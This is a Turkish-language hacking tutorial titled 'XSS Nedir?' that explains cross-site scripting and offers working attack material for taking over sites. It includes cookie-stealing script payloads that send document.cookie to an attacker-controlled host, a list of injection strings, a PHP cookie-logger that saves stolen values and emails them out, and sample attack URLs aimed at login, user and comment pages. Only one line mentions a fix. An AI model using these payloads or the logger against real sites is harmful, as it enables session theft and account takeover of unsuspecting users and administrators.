XSS Nedir?
XSS nedir ?
xss sistemlerdeki script açıklarıdır...
Arama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur.. Bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..
örn :
[url]http://localhost/hedefdeneme/index.php?content=<h1>Security[at]Rawkmetal[dot]com[/url]
[url]http://localhost/asp-hedef/newcat.asp?tagx=<h1>Security[at]Rawkmetal[dot]com[/url]
devam edelim...
Xss Hangi Sistemler Kullanılır..
Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır. Ama Asp'de kullanılmaz anlamına gelmez. Asp için daha çok SQL İnjection dediğimiz tablo isimlerine yapılan illegal girişimlerdir..
Biraz daha örnekleyerek anlatalım..
Asp , Php farketmez :
">nedirbu<"font%20size=20>OwNz b7 ********%20:P</font>
basit bir arama scriptinde kullanılıcak açık..
Yukardaki Xss yi biraz daha açalım .(php)
( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..
Session'da $username adlı bir değişken var diyelim.Sayfada echo'landığı $_SESSION['variable'] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable'ı ekrana basacaktır.
ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...
Güvenlik İçin :
strip_tags() ya da htmlspecialchars komutlarıyla bu açığı kapatabiliriz.
Java Scripti Neden Çalıştırırız?
Cookie Almak için Biraz Script Yazalım.
Altaki Mini Scriptler Vasıtasıyla Cookie Almamızı ve Siteye Admin Yetkisinden Ulaşmamızı Sağlar.
<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>
<script>alert('wvs-xss-magic-string-${random}');</script>
'><script>alert('wvs-xss-magic-string-${random}');</script>
"><script>alert('wvs-xss-magic-string-${random}');</script>
><script>alert('wvs-xss-magic-string-${random}');</script>
</textarea><script>alert('wvs-xss-magic-string-${random}');</script>
<script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>
><script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>
</textarea>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>
--><script>alert('wvs-xss-magic-string-${random}');</script>
Cookie Almak İçin
<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("mailadresiniz@mail.com","Şifre Geldi çip çip ","http://www.site.com/ekledik.txt",'From: [email]Taze_Kek@geldi.com');[/email]
?>
chmod ayarını 777 yapmak lazım yoksa gelen cookie kaydetmez
Örnek
:2082/login?user=**<SCRIPT>location.href='http://www.siteniz.com/kekle.php?c='escape(document. cookie)</script>
/users.php?f=1&s=1'<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>&w=asc&d=50
comments.php?id=1"<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>
/modules.php?f=1&s=1'%3CXML SRC="javascript:alert('hacked by oturgaçlı götüreç');"%3E
:2082/login?user=**<SCRIPT>location.href='http://www.siteniz.com/kekle.php?c='escape(document. cookie)</script>
gibi
Tarih:
Hit: 18386
Yazar: Rawkmetal